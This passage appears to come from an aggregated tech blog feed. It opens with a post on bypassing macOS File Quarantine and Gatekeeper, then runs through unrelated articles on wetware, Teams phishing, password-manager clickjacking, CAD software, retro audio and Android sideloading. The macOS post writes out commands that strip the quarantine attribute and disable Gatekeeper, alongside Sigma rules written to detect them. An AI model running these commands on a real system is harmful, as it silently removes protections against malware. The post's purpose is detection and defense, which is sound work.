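    Returns None when the file carries no attribute at all, which is the
    case the post flags as an extra risk factor (curl/wget download, or a
    manual `xattr -d`). Only useful where the xattr command exists (macOS).
    """
    try:
        proc = subprocess.run(["xattr", "-p", QUARANTINE_XATTR, path],
                              capture_output=True, text=True, check=False)
    except FileNotFoundError:                 # no xattr binary on this host
        return None
    if proc.returncode != 0 or not proc.stdout.strip():
        return None
    return parse_quarantine_value(proc.stdout)


# Constructed sample, mirroring the four fields the post's screenshot describes.
SAMPLE_VALUE = "0083;689cb865;Safari;66EA7FA5-1F9E-4779-A5B5-9CCA2A4A98F5"

if __name__ == "__main__":
    info = parse_quarantine_value(SAMPLE_VALUE)
    print(f"flags=0x{info.flags:04x} downloaded={info.timestamp:%Y-%m-%d %H:%M:%S %Z} "
          f"by {info.agent} event={info.event_id}")
```

The event_id is what ties the file back to its row in com.apple.LaunchServices.QuarantineEventsV2, so a triage script can pair the attribute on disk with the download origin recorded in that database; a file that returns None from read_quarantine despite arriving from the internet is the case the next paragraphs discuss.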
To avoid having their files quarantined, attackers use various techniques to bypass File Quarantine. For example, files downloaded via curl, wget or other low-level tools that are not integrated with File Quarantine are not flagged with the quarantine attribute.
Bypassing quarantine using curl
It is also possible to remove the attribute manually using the xattr -d com.apple.quarantine <filename> command.
Removing the quarantine attribute
If the quarantine attribute is successfully removed, no warning will be displayed when the file is run, which is useful in social engineering attacks or in cases where the attacker prefers to execute malware without the user’s knowledge.
Running a file without a File Quarantine check
To detect this activity, you need to monitor execution of the xattr command in conjunction with -d and com.apple.quarantine, which implies removal of the quarantine attribute. In an incident related to macOS compromise, also worth investigating is the origin of the file: if it got onto the host without being flagged by quarantine, this is an additional risk factor. Below is an example of an EDR triggering on a quarantine attribute removal event, as well as an example of a rule for detecting such events.
Example of an event from Kaspersky EDR
Sigma:
title: Quarantine attribute removal
description: This rule detects removal of the quarantine attribute, which bypasses File Quarantine
tags:
    - attack.defense-evasion
    - attack.t1553.001
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        cmdline|contains|all:
            - 'xattr'
            - '-d'
            - 'com.apple.quarantine'
    condition: selection
falsepositives:
    - Unknown
level: high
Gatekeeper
Gatekeeper is a key part of the macOS security system, designed to protect users from running potentially dangerous applications. First introduced in OS X Leopard (2012), Gatekeeper checks the digital signature of applications and, if the quarantine attribute (com.apple.quarantine) is present, restricts the launch of programs unsigned and unapproved by the user, thus reducing the risk of malicious code execution.
The spctl utility is used to manage Gatekeeper. Below is an example of calling spctl to check the validity of a file’s signature and whether it is verified by Apple:
spctl -a -t exec -vvvv <path to file>
Checking an untrusted file using spctl
Checking a trusted file using spctl
Gatekeeper requires an application to be:
- either signed with a valid Apple developer certificate,
- or certified by Apple after source code verification.
If the application fails to meet these requirements, Gatekeeper by default blocks attempts to run it with a double-click. Unblocking is possible, but this requires the user to navigate through the settings. So, to carry out a successful attack, the threat actor has to not only persuade the victim to mark the application as trusted, but also explain to them how to do this. The convoluted procedure to run the software looks suspicious in itself. However, if the launch is done from the context menu (right-click → Open), the user sees a pop-up window allowing them to bypass the block with a single click by confirming their intention to use the application. This quirk is used in social engineering attacks: malware can be accompanied by instructions prompting the user to run the file from the context menu.
Example of Chropex Adware using this technique
Let’s take a look at the method for running programs from the context menu, rather than double-clicking. If we double-click the icon of a program with the quarantine attribute, we get the following window.
Running a program with the quarantine attribute by double-clicking
If we run the program from the context menu (right-click → Open), we see the following.
Running a program with the quarantine attribute from the context menu
Attackers with local access and administrator rights can disable Gatekeeper using the spctl --master-disable or spctl --global-disable command.
To detect this activity, you need to monitor execution of the spctl command with the --master-disable or --global-disable parameter, which disables Gatekeeper. Below is an example of an EDR triggering on a Gatekeeper disable event, as well as an example of a detection rule.
Example of a Kaspersky EDR event
Sigma:
title: Gatekeeper disable
description: This rule detects disabling of Gatekeeper
tags:
    - attack.defense-evasion
    - attack.t1562.001
logsource:
    category: process_creation
    product: macos
detection:
    selection_bin:
        cmdline|contains: 'spctl'
    selection_args:
        cmdline|contains:
            - '--master-disable'
            - '--global-disable'
    condition: selection_bin and selection_args
Takeaways
The built-in macOS protection mechanisms are highly resilient and provide excellent security. That said, as with any mature operating system, attackers continue to adapt and search for ways to bypass even the most reliable protective barriers. In some cases when standard mechanisms are bypassed, it may be difficult to implement additional security measures and stop the attack. Therefore, for total protection against cyberthreats, use advanced solutions from third-party vendors. Our Kaspersky EDR Expert and Kaspersky Endpoint Security detect and block all the threats described in this post. In addition, to guard against bypassing of standard security measures, use the Sigma rules we have provided.
What Wetware Is: the Future of Brain Enhancement Through Hardware and Software
By definition, wetware is technology that combines hardware and software to enhance biological life forms. Steve M. Potter, an associate professor at the Neuroengineering Laboratory of the University of Georgia, has predicted that a new revolution is on its way.
But when will all this happen? In fact, it is already happening.
What is meant by wetware
Since 1996, Potter has been involved in cutting-edge research into “the possibilities of developing hardware-enhanced cognition in people”. In the essay “The future of computing and neural interfacing”, Potter describes how all life as we know it is made of cells, which are “soft and full of salt water”.
This is why the control systems of animals (networks of neurons and glial cells) are sometimes called “wetware”; they are the basis of all natural intelligence (NI). Computers and digital systems, by contrast, are “dry and hard”: hardware is the substrate on which today’s artificial intelligence (AI) runs.
Wetware operates (as far as we understand it) by rules very different from those of digital hardware. The inevitable path toward this hybrid neural-synthetic future will be paved by a better understanding of the brain and better neural interfaces, as well as by computers that better emulate brain function and by specialized, brain-inspired neuromorphic software and hardware.
For example, deep learning is readily understood as an application of neuroscience to computing, and thus as a source of inspiration for a new generation of software. Taking this to the next level, it will not only be software that enhances our minds, but also specialized hardware involved in these new technologies. To date, neither AI nor natural intelligence (NI) has truly benefited from hybrid hardware-wetware systems.
Why not?
Because living neural systems are complex and hard to understand, let alone to “reverse engineer”, to borrow an analogy from the computing world. Neural interfacing is technically demanding. But Prof. Potter is confident that wetware-hardware will one day be as common and useful as digital computers are today.
Unlike quantum computing, we have many examples of working devices that perform incredible, miniaturized processing. Even a fly’s brain is more powerful and efficient than the best digital flight controllers humans have ever designed.
How do brains achieve such astonishing feats of real-time sensor processing and such precise movement control in so small an organism?
Unlocking the Brain’s Mysteries to Create Hybrid Artificial Intelligences
There is strong motivation to uncover enough of the brain’s secrets to create new forms of hybrid artificial intelligence that make the most of digital computing paired with a real brain. It is somewhat shocking how poorly we understand the brain today, considering how important it is in our lives.
Neurobiologists do not really understand what a thought actually is, where feelings come from, how memories are stored, or how we learn. We are at a stage equivalent to the Victorian understanding of the sun: there are probably concepts of brain function that we cannot yet conceive of, in the same way that nuclear fusion would astonish an 18th-century scientist.
But there is reason for optimism: the brisk pace of academic neuroscience research is spurred by funding from the Brain Research through Advancing Innovative Neurotechnologies (BRAIN) initiative created by the Obama administration and by the EU’s Human Brain Project.
Progress will come when these efforts merge with those dedicated to building better artificial intelligence systems, such as OpenAI, Google’s Deep Mind, IBM’s Watson and the related AI projects at Facebook, Amazon, Microsoft, Baidu, etc.
But an incomplete understanding of the nervous system and of NI is no excuse for holding back from implementing some version of what we do know in artificial systems. The immense complexity of the nervous system may be important for delivering NI’s powerful capabilities.
However, the capabilities of neurally inspired deep learning systems show that we can perform many useful AI tasks by emulating only a small part of that complexity.
Progress in Neural Interfaces
Advances in neuromorphic software and hardware may replace the use of actual living tissue for computation, in the same way that jet aircraft removed the need to build flapping wings in order to make things that fly fast.
Researchers use neural interfaces to study and influence the nervous system in people, in animals and in vitro. Neural interfaces come in two types: enhanced humans and enhanced computers.
Humans enhanced with neural interface technology perform miracles on a daily basis: the deaf use cochlear implants to hear, people with paraplegia use spinal cord stimulators to walk, and those with pain and tremors use deep brain stimulators to relieve their suffering.
But the second type of neural interface, computers enhanced with living neurons, is still a laboratory curiosity.
Since 1999, Potter’s laboratory at Caltech and at Georgia Tech University has developed open-source neural interface technology, including NeuroRighter. Closed-loop neural interfaces use electrical and optical stimulation to train brain tissue growing in a Petri dish.
This was a first but crucial step toward creating useful hybrid computing systems. Some work was published ten years ago, but since then hardware incorporating wetware (living neurons) has not made great progress. Today’s electrical neural interfaces are rudimentary. They lack the feedback that is ubiquitous in nervous systems and use only a few electrodes with limited bandwidth.
The article What Wetware Is: the Future of Brain Enhancement Through Hardware and Software comes from the cybersecurity blog.
CAD, From Scratch: MakerCAD
It’s likely that many of you use some form of CAD package, but how many of you have decided you didn’t like the software on offer? [Marcus Wu] did, and instead of griping, he wrote his own CAD software. It’s called MakerCAD, it’s published under an MIT licence, and you can try it yourself.
It’s written in Go, and it’s superficially similar to OpenSCAD in that the interface is through code. The similarity is skin deep though, as it provides the user with constraint solving as described in the video below the break.
As it stands it’s by no means feature complete, but it is now at a point at which it can be evaluated. Simple models can be created and exported as STEP files, so it can be used as a real-world CAD tool.
Whether it will flourish is down to the path it takes and how its community guides it. But we’re pleased to see any new open source projects in this space, which remains overly dominated by proprietary packages. If you try it, write up your experiences, we’d love to see how this develops.
youtube.com/embed/dFXxCYjCpHU?…
Phishing on Teams: at least the hacker replies faster than the real help desk!
In recent months, as Red Hot Cyber has reported several times, a new front has emerged in corporate phishing: attacks via Microsoft Teams in which the attackers pose as IT or help desk staff. Taking advantage of the platform’s basic features, such as external communication being allowed by default, the attackers engage users with messages, calls or screen-sharing requests, often slipping unobtrusively into the Teams chat. The effectiveness of these tactics has grown alongside the widespread adoption of Teams as a primary collaboration tool.
The damage materializes when the victim, convinced they are helping an internal technician, grants screen sharing or the use of remote control tools (such as Quick Assist, AnyDesk or RMM tools). This lets attackers install malware, compromise endpoints, disable protections and move laterally through the corporate network. One campaign, named VEILDrive, showed how the attacker used a previously compromised account to send phishing messages via Teams and thereby gain initial access.
VEILDrive attack path (source: Hunters Security)
A frequently observed modus operandi involves email bombing, a flood of emails in a short time, even thousands in a few minutes, to create a sense of urgency and push victims to seek technical help.
The attackers use this pretext to contact them via Teams. In this context, victims receive messages from unverified .onmicrosoft.com domains that nevertheless include words such as “helpdesk”, “IT” or “support”, increasing the risk of confusion.
Attackers sometimes begin by compromising internal Teams accounts or by creating standalone Entra ID tenants, often using .onmicrosoft.com domains, especially where no custom configuration is in place. The differences between personal accounts, trial licenses and corporate tenants then affect the logs generated and the features available.
One-to-one chat phishing exploits how easily, via Teams, one can search for external users and message them, a capability supported by the platform’s interface. Although Microsoft shows warnings for external or suspicious messages, these can be circumvented in later stages of the attack.
Microsoft 365 logs offer important traces for investigation: events such as ChatCreated, MessageSent, UserAccepted and TeamsImpersonationDetected make it possible to reconstruct suspicious conversations, identify clicks on external communication warnings, and even detect impersonation attempts.
In the case of voice calls (vishing), Teams shows no warnings on the victim’s side and the logs remain limited, generating only events such as ChatCreated and MessageSent, which makes it hard to distinguish these calls from text chats. Furthermore, screen sharing can easily be enabled if the user falls for it, while remote control is blocked by default but can be enabled via policy, increasing the attack surface.
To counter this threat, Team AXON proposes UEBA-based detection logic, enriched with scoring and context: it identifies unusual external chats, .onmicrosoft.com domains, patterns with suspicious keywords (e.g. helpdesk), use of non-ASCII characters (emoji), and spikes in TIMailData tied to email bombing. The analysis also considers events such as UserAccepted, user replies, or the addition of members to threads.
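As an added example that is neither Team AXON’s detection logic nor Hunters’ code, the Python below turns the signals listed above into a per-chat score: a one-to-one chat opened from outside the organisation, a sender on a default .onmicrosoft.com domain, help-desk keywords in the display name, non-ASCII characters in it, and the target clicking through the external-sender warning (the UserAccepted event). The flat record shape (Operation, ChatId, Sender, SenderDisplayName, ChatType, Target), the organisation’s verified domain example.com and the alert threshold are assumptions for the demo; real Unified Audit Log entries nest these fields differently and would need a thin extraction layer first.

```python
"""Score Teams audit records for help-desk impersonation (added example).

Not Team AXON's logic or Hunters' code. Each chat gets points for the
signals the article lists; the flat record shape, the verified internal
domain and the threshold are assumptions for the demo.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

INTERNAL_DOMAINS = {"example.com"}           # assumed: the tenant's own verified domains
KEYWORDS = re.compile(r"help ?desk|service ?desk|it[ -]?support|\bsupport\b", re.I)
THRESHOLD = 5                                # assumed alert threshold


def _domain(upn: str) -> str:
    return upn.rsplit("@", 1)[-1].lower()


def score_chat(records: List[Dict]) -> Tuple[int, List[str]]:
    """Score one chat's records; returns (score, human-readable reasons)."""
    created = next((r for r in records if r["Operation"] == "ChatCreated"), None)
    if created is None:
        return 0, []
    score, reasons = 0, []
    sender, name = created["Sender"], created.get("SenderDisplayName", "")
    external = _domain(sender) not in INTERNAL_DOMAINS
    if external and created.get("ChatType") == "OneOnOne":
        score += 2
        reasons.append("one-to-one chat opened by an external tenant")
    if _domain(sender).endswith(".onmicrosoft.com"):
        score += 2
        reasons.append("sender uses a default .onmicrosoft.com domain")
    if KEYWORDS.search(name):
        score += 3
        reasons.append(f"help-desk keyword in display name {name!r}")
    if any(ord(ch) > 127 for ch in name):
        score += 1
        reasons.append("non-ASCII characters in display name")
    if any(r["Operation"] == "UserAccepted" for r in records):
        score += 2
        reasons.append("target accepted the external-sender warning (UserAccepted)")
    return score, reasons


def score_all(records: List[Dict]) -> Dict[str, Tuple[int, List[str]]]:
    """Group records by ChatId and score every chat."""
    by_chat = defaultdict(list)
    for r in records:
        by_chat[r["ChatId"]].append(r)
    return {cid: score_chat(recs) for cid, recs in by_chat.items()}


def suspicious_chats(records: List[Dict], threshold: int = THRESHOLD) -> List[str]:
    """ChatIds whose score reaches the threshold, sorted for stable output."""
    return sorted(cid for cid, (s, _) in score_all(records).items() if s >= threshold)


# Constructed records: one impersonation attempt (c1) and one internal chat (c2).
SAMPLE_RECORDS = [
    {"Operation": "ChatCreated", "ChatId": "c1", "ChatType": "OneOnOne",
     "Sender": "svc@contoso-it.onmicrosoft.com", "SenderDisplayName": "IT Help Desk \u2714",
     "Target": "bob@example.com"},
    {"Operation": "MessageSent", "ChatId": "c1", "Sender": "svc@contoso-it.onmicrosoft.com"},
    {"Operation": "UserAccepted", "ChatId": "c1", "Sender": "bob@example.com"},
    {"Operation": "ChatCreated", "ChatId": "c2", "ChatType": "OneOnOne",
     "Sender": "alice@example.com", "SenderDisplayName": "Alice Example",
     "Target": "bob@example.com"},
    {"Operation": "MessageSent", "ChatId": "c2", "Sender": "alice@example.com"},
]

if __name__ == "__main__":
    for cid, (score, reasons) in score_all(SAMPLE_RECORDS).items():
        print(cid, score, "; ".join(reasons))
```

With these weights the constructed chat c1 scores 10 and c2 scores 0; the keyword and onmicrosoft.com signals alone would already clear the threshold, which matches the article’s point that those two features are the cheapest to check and the most characteristic of this campaign.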
Technical measures complete the picture: deploying an Endpoint Detection and Response (EDR) system combined with next-generation antivirus (Next-Gen AV) is recommended. These tools can block anomalous behaviour, intercept malicious applications and support post-incident investigation.
The article Phishing on Teams: at least the hacker replies faster than the real help desk! comes from the cybersecurity blog.
Why Super Mario 64 Wastes So Much Memory
The Nintendo 64 was an amazing video game console, and alongside consoles like the Sony PlayStation, helped herald in the era of 3D games. That said, it was new hardware, with new development tools, and thus creating those early N64 games was a daunting task. In an in-depth review of Super Mario 64’s code, [Kaze Emanuar] goes over the curious and wasteful memory usage, mostly due to unused memory map sections, unoptimized math look-up tables and greedy asset loading.
The game as delivered in the Japanese and North-American markets also seems to have been a debug build, with unneeded code everywhere. That said, within the context of the three-year development cycle, it’s not bad at all — with twenty months spent by seven programmers on actual development for a system whose hardware and tooling were still being finalized, with few examples available of how to do aspects like level management, a virtual camera, etc. Over the years [Kaze] has probably spent more time combing over SM64‘s code than the original developers, as evidenced by his other videos.
As noted in the video, later N64 games like Legend of Zelda: Ocarina of Time are massively more optimized and streamlined, as lessons were learned and tooling improved. For the SM64 developers, however, they had a gargantuan 4 MB of fast RDRAM to work with, so optimization and memory management likely got kicked down to the bottom on the priority list. Considering the absolute smash hit that SM64 became, it seems that these priorities were indeed correct.
youtube.com/embed/oZcbgNdWL7w?…
Tefifon: Germany’s Tape-Shaped Record Format
A Tefifon cartridge installed for playback. (Credit: Our Own Devices, YouTube)
Recently the [Our Own Devices] YouTube channel took a gander at the Tefifon audio format. This was an audio format that competed with shellac and vinyl records from the 1930s to the 1960s, when the company behind it went under. Some people may already know Tefifon as [Matt] from Techmoan has covered it multiple times, starting with a similar machine about ten years ago, all the way up to the Stereo Tefifon machine, which was the last gasp for the format.
There’s a lot to be said for the Tefifon concept, as it fixes many of the issues of shellac and vinyl records, including the limited run length and having the fragile grooves exposed to damage and dust. By having the grooves instead on a flexible band that got spooled inside a cartridge, they were protected, with up to four hours of music or eight hours of spoken content, i.e. audio books.
Although the plastic material used for Tefifon bands suffered from many of the same issues as the similar Dictabelt audio recording system, such as relatively rapid wear and degradation (stiffening) of the plastic, it was mostly the lack of interest from the audio labels that killed the format. With the big labels and thus big artists heavily invested in records, the Tefifon never really got any hits and saw little use outside of West Germany throughout the 1950s and 1960s before its last factories were shuttered.
youtube.com/embed/8Uoes4JXZeI?…
youtube.com/embed/nBNTAmLRmUg?…
Linear Actuators 101
Linear actuators are a great help when you’re moving something along a single axis, but with so many options, how do you decide? [Jeremy Fielding] walks us through some of the high level tradeoffs of using one type of actuator over another.
There are three main types of linear actuator available to the maker: hydraulic, pneumatic, and electric. Both the hydraulic and pneumatic types move a cylinder with an attached rod through a tube using pressure applied to either side of the cylinder. [Fielding] explains how the pushing force will be greater than the pulling force on these actuators since the rod reduces the available surface area on the cylinder when pulling the rod back into the actuator.
Electric actuators typically use an electric motor to drive a screw that moves the rod in and out. Unsurprisingly, the electric actuator is quieter and more precise than its fluid-driven counterparts. Pneumatic wins out when you want something fast and without a mess if a leak happens. Hydraulics can be driven to higher pressures and are typically best when power is the primary concern which is why we see them in construction equipment.
You can DIY your own linear actuators, we’ve seen tubular stepper motors, and even a linear actuator inspired by muscles.
youtube.com/embed/YzgFyO_W2nM?…
Animatronic Eyes Are Watching You
If you haven’t been following [Will Cogley]’s animatronic adventures on YouTube, you’re missing out. He’s got a good thing going, and the latest step is an adorable robot that tracks you with its own eyes.
Yes, the cameras are embedded inside the animatronic eyes. That was a lot easier than expected; rather than the redesign he was afraid of, [Will] was able to route the camera cable through his existing animatronic mechanism, and only needed to hollow out the eyeball. The tiny camera’s aperture sits nigh-undetectable within the pupil.
On the software side, face tracking is provided by MediaPipe. It’s currently running on a laptop, but the plan is to embed a Raspberry Pi inside the robot at a later date. MediaPipe tracks any visible face and calculates the X and Y offset to direct the servos. With a dead zone at the center of the image and a little smoothing, the eye motion becomes uncannily natural. [Will] doesn’t say how he’s got it set up to handle more than one face; likely it will just stick with the first object identified.
Eyes aren’t much by themselves, so [Will] goes further by creating a little robot. The adorable head sits on a 3D-printed tapered roller bearing atop a very simple body. Another printed mechanism allows for pivot, and both axes are servo-controlled, bringing the total number of motors up to six. Tracking prefers eye motion, and the head pivots to follow to try and create a naturalistic motion. Judge for yourself how well it works in the video below. (Jump to 7:15 for the finished product.)
We’ve featured [Will]’s animatronic anatomy adventures before: everything from beating hearts, and full-motion bionic hands, to an earlier, camera-less iteration of the eyes in this project.
Don’t forget if you ever find yourself wading into the Uncanny Valley that you can tip us off to make sure everyone can share in the discomfort.
Popular password managers, including LastPass, 1Password and Bitwarden, are vulnerable to clickjacking
A security expert has discovered that six of the most popular password managers, used by tens of millions of people, are vulnerable to clickjacking, a technique that allows attackers to steal login credentials, two-factor authentication codes and credit card data.
The problem was first reported by independent researcher Marek Tóth, who presented a report on the vulnerabilities at the recent DEF CON 33 hacker conference. His findings were later confirmed by experts at Socket, who helped notify the affected vendors and coordinate public disclosure of the vulnerabilities.
He tested his attack on specific versions of 1Password, Bitwarden, Enpass, iCloud Passwords, LastPass and LogMeOnce and found that all of the browser versions could leak sensitive data in certain scenarios.
Attackers can exploit the vulnerabilities when victims visit malicious pages, or sites vulnerable to XSS or cache poisoning. This lets the attacker overlay invisible HTML elements on the password manager’s interface. The user thinks they are interacting with harmless clickable elements on the page, but in fact triggers autofill, which “leaks” their confidential information to the attacker.
The attack relies on running a script on a malicious or compromised website. This script uses transparency settings, overlays or pointer events to hide the autofill dropdown of the browser’s password manager. At the same time, the attacker places fake, attention-grabbing elements on the page (such as cookie banners, pop-ups or CAPTCHAs). Clicks on these elements actually land on the hidden password manager controls, which then fill the forms with confidential information.
He demonstrated several DOM-based subtypes and exploits of the same bug: direct manipulation of the DOM element’s opacity, manipulation of the root element’s opacity, manipulation of the parent element’s opacity, and partial or full overlay.
The researcher also demonstrated a method in which the UI follows the mouse cursor, so that any click by the user, wherever it lands, triggers autofill of the data. Tóth also pointed out that the malicious script can automatically detect which password manager is active in the victim’s browser and tailor the attack to that specific target in real time.
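As an added example, not code from the article or from any of the password managers it names, here is the kind of visibility check an autofill dropdown could run before honouring a click, covering the opacity variants (element, parent, root) and the partial or full overlay variant described above. The minimal DOM-like model, the 0.9 opacity threshold and all function names are assumptions chosen so that the check runs outside a browser; in an extension they map to getComputedStyle(), getBoundingClientRect() and document.elementFromPoint().

```javascript
// Added example (not from the article or any password manager it names): a check that a
// password manager's autofill dropdown is really visible before a click on it is trusted.
// Nodes have `parent`, `style` (computed style) and `rect`; the document has elementFromPoint.
const MIN_VISIBLE_OPACITY = 0.9; // chosen threshold: anything more translucent counts as hidden

const makeNode = (parent, style = {}, rect = null) => ({ parent, style, rect });

// Minimal document: `layers` holds hit-testable nodes in paint order (topmost last).
function makeDoc() {
  const layers = [];
  const hit = (r, x, y) => x >= r.x && x < r.x + r.width && y >= r.y && y < r.y + r.height;
  return {
    layers,
    elementFromPoint: (x, y) => [...layers].reverse().find((n) => hit(n.rect, x, y)) ?? null,
  };
}

// Opacity composes multiplicatively up the ancestor chain, so 0.02 on <html> (the
// "root element opacity" variant) hides a dropdown whose own opacity is 1.
function effectiveOpacity(node) {
  let o = 1;
  for (let n = node; n; n = n.parent) {
    const v = parseFloat(n.style.opacity ?? '1');
    if (!Number.isNaN(v)) o *= v;
  }
  return o;
}

const isInside = (ancestor, node) => {
  for (let n = node; n; n = n.parent) if (n === ancestor) return true;
  return false;
};

// Probe the corners and centre of the dropdown; every probe must land on the dropdown
// (or one of its children), otherwise something is painted over it (overlay variants).
function occludedProbes(doc, d) {
  const { x, y, width: w, height: h } = d.rect;
  const probes = [[x + 1, y + 1], [x + w - 1, y + 1], [x + 1, y + h - 1], [x + w - 1, y + h - 1], [x + w / 2, y + h / 2]];
  return probes.filter(([px, py]) => !isInside(d, doc.elementFromPoint(px, py))).length;
}

// Returns { ok, reasons }; when ok is false the extension should not autofill from the
// click, or should ask for confirmation inside its own trusted popup instead.
function autofillUiIsVisible(doc, dropdown) {
  const reasons = [];
  const op = effectiveOpacity(dropdown);
  if (op < MIN_VISIBLE_OPACITY) reasons.push(`opacity=${op.toFixed(2)}`);
  const covered = occludedProbes(doc, dropdown);
  if (covered > 0) reasons.push(`occluded-probes=${covered}/5`);
  return { ok: reasons.length === 0, reasons };
}

// Constructed scenario: <html> made nearly transparent plus a decoy "cookie banner"
// painted over the left half of the dropdown (root-opacity and partial-overlay variants).
function demoScenario() {
  const doc = makeDoc();
  const html = makeNode(null, { opacity: '0.02' });
  const body = makeNode(html, {}, { x: 0, y: 0, width: 800, height: 600 });
  const dropdown = makeNode(body, { opacity: '1' }, { x: 100, y: 100, width: 200, height: 80 });
  const banner = makeNode(body, {}, { x: 0, y: 0, width: 200, height: 600 });
  doc.layers.push(body, dropdown, banner);
  return { doc, dropdown };
}
```

One caveat: a decoy with `pointer-events: none` is skipped by elementFromPoint, so the probe check does not see it; that occlusion case is what the `trackVisibility` option of IntersectionObserver v2 exists to detect.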
In all, the researcher tested 11 password managers for clickjacking and found that every one was vulnerable to at least one of the attack methods. Although Tóth had notified all the vendors of the problems as early as April 2025, and had warned them that public disclosure was planned for DEF CON 33, there was no immediate response. Last week, Socket contacted the developers again to stress the need to assign CVEs to the problems in the affected products.
1Password representatives called the researcher’s report “informative”, arguing that clickjacking is a common threat that users should essentially protect themselves against. LastPass developers also found the report “informative”, and Bitwarden acknowledged the problems; although the company did not consider them serious, fixes were implemented in version 2025.8.0, released last week. The following password managers, which together have around 40 million users, are currently vulnerable to clickjacking attacks:
- 1Password 8.11.4.27
- Bitwarden 2025.7.0
- Enpass 6.11.6 (partial fix implemented in version 6.11.4.2)
- iCloud Passwords 3.1.25
- LastPass 4.146.3
- LogMeOnce 7.12.4
Patches have already been shipped by the following vendors: Dashlane (v6.2531.1, released on August 1), NordPass, ProtonPass, RoboForm and Keeper (17.2.0, released in July). Users are now advised to make sure they have installed the latest available versions of these products.
The article Popular password managers, including LastPass, 1Password and Bitwarden, are vulnerable to clickjacking originally appeared on il blog della sicurezza informatica.
PVDF: the Specialized Filament for Chemical and Moisture Resistance
There’s a dizzying number of specialist 3D printing materials out there, some of which do try to offer an alternative to PLA, PA6, ABS, etc., while others are happy to stay in their own niche. Polyvinylidene fluoride (PVDF) is one of these materials, with the [My Tech Fun] YouTube channel recently getting sent a spool of PVDF for testing, which retails for a cool $188.
Some of the build plate carnage observed after printing with PVDF. (Credit: My Tech Fun, YouTube)
Reading the specifications and datasheet for the filament over at the manufacturer’s website, it’s pretty clear what the selling points for this material are. For the chemists in the audience the addition of fluoride is probably a dead giveaway, as fluoride bonds in a material tend to be very stable. Hence PVDF ((C2H2F2)n) sees use in applications where strong resistance to aggressive chemicals as well as hydrolysis is a requirement, not to mention no hygroscopic inclinations, somewhat like PTFE and kin.
In the video’s mechanical testing it was therefore unsurprising that other than abrasion resistance it’s overall worse and more brittle than PA6 (nylon). It was also found that printing this material with two different FDM printers with the required bed temperature of 110°C was somewhat rough, with some warping and a wrecked engineering build plate in the Bambu Lab printer due to what appears to be an interaction with the usual glue stick material. Once you get the print settings dialed in it’s not too complicated, but it’s definitely not a filament for casual use.
The Browser Wasn’t Enough, Google Wants to Control All Your Software
A few days ago we brought you word that Google was looking to crack down on “sideloaded” Android applications. That is, software packages installed from outside of the mobile operating system’s official repository. Unsurprisingly, a number of readers were outraged at the proposed changes. Android’s open nature, at least in comparison to other mobile operating systems, is what attracted many users to it in the first place. Seeing the platform slowly move towards its own walled garden approach is concerning, especially as it leaves the fate of popular services such as the F-Droid free and open source software (FOSS) repository in question.
But for those who’ve been keeping an eye out for such things, this latest move by Google to throw their weight around isn’t exactly unexpected. They had the goodwill of the community when they decided to develop an open source browser engine to keep the likes of Microsoft from taking over the Internet and dictating the rules, but now Google has arguably become exactly what they once set out to destroy.
Today they essentially control the Internet, at least as the average person sees it, they control 72% of the mobile phone OS market, and now they want to firm up their already outsized control over which apps get installed on your phone. The only question is whether or not we let them get away with it.
Must be This High to Ride
First, “sideloading”. The way you’re supposed to install apps on your Android device is through the Google Play store, and maybe your phone manufacturer’s equivalent. All other sources are, by default, untrusted. What used to be refreshing about the Android ecosystem, at least in comparison, was how easy it was to sideload an application that didn’t come directly from (and profit) Big G. That is what’s changing.
Of course, the apologists will be quick to point out that Google isn’t taking away the ability to sideload applications on Android. At least, not on paper. What they’re actually doing is making it so sideloaded applications need to be from a verified developer. According to their blog post on the subject, they have no interest in the actual content of the apps in question, they just want to confirm a malicious actor didn’t develop it.
The blog post attempts to make a somewhat ill-conceived comparison between verifying developer identities with having your ID checked at the airport. They go on to say that they’re only interested in verifying each “passenger” is who they say they are for security purposes, and won’t be checking their “bags” to make sure there’s nothing troubling within. But in making this analogy Google surely realizes — though perhaps they hope the audience doesn’t pick up on — the fact that the people checking ID at the airport happen to wear the same uniforms as the ones who x-ray your bags and run you through the metal detector. The implication being that they believe checking the contents of each sideloaded package is within their authority, they have simply decided not to exercise that right. For now.
Conceptually, this initiative is not unlike another program Google announced this summer: OSS Rebuild. Citing the growing risk of supply chain attacks, where malicious code sneaks into a system thanks to the relatively lax security of online library repositories, the search giant offers a solution. They propose setting up a system by which they not only verify the authors of these open source libraries, but scan them to make sure the versions being installed match the published source code. In this way, you can tell that not only are you installing the authentic library, but that no rogue code has been added to your specific copy.
Google the Gatekeeper
Much like verifying the developer of sideloaded applications, OSS Rebuild might seem like something that would benefit users at first glance. Indeed, there’s a case to be made that both programs will likely identify some low-hanging digital fruit before it has the chance to cause problems. An event that you can be sure Google will publicize for all it’s worth.
But in both cases, the real concern is that of authority. If Google gets to decide who a verified developer is for Android, then they ultimately have the power to block whatever packages they don’t like. To go back to their own airport security comparison, it would be like if the people doing the ID checks weren’t an independent security force, but instead representatives of a rival airline. Sure they would do their duty most of the time, but could they be trusted to do the right thing when it might be in their financial interests not to? Will Google be able to avoid the temptation to say that the developers of alternative software repositories are persona non grata?
Even more concerning, who do you appeal to if Google has decided they don’t want you in their ecosystem? We’ve seen how they treat YouTube users that have earned their ire for some reason or another. Can developers expect the same treatment should they make some operational faux pas?
Let us further imagine that verification through OSS Rebuild becomes a necessary “Seal of Approval” to be taken seriously in the open source world — at least in the eyes of the bean counters and decision makers. Given Google’s clout, it’s not hard to picture such an eventuality. All Google would have to do to keep a particular service or library down is elect not to include them in the verification process.
Life Finds a Way
If we’ve learned anything about Google over the years, it’s that they can be exceptionally mercurial. They’re quick to drop a project and change course if it seems like it isn’t taking them where they want to go. Even projects that at one time seemed like they were going to be a pivotal part of the company’s future — such as Google+ — can be kicked to the curb unceremoniously if the math doesn’t look right to them. Indeed, the graveyard of failed Google initiatives has far more headstones than the company’s current roster of offerings.
Which is to say that there’s every possibility that user reaction to this news might be enough to get Google to take a different tack. Verified sideloading isn’t slated to go live until 2027 for most of the world, although some territories will get it earlier, and a lot can happen between now and then.
Even if Google goes through with it, they’ve already offered something of an olive branch. The blog post mentions that they intend to develop a carve out in the system that will allow students and hobbyists to install their own self-developed applications. Depending on what that looks like, this whole debate could be moot, at least for folks like us.
In either event, the path would seem clear. If we want to make sure there’s choice when it comes to Android software, the community needs to make noise about the issue and keep the pressure on. Google’s big, but we’re bigger.
Receiving Radio Signals from Space Like It’s 1994
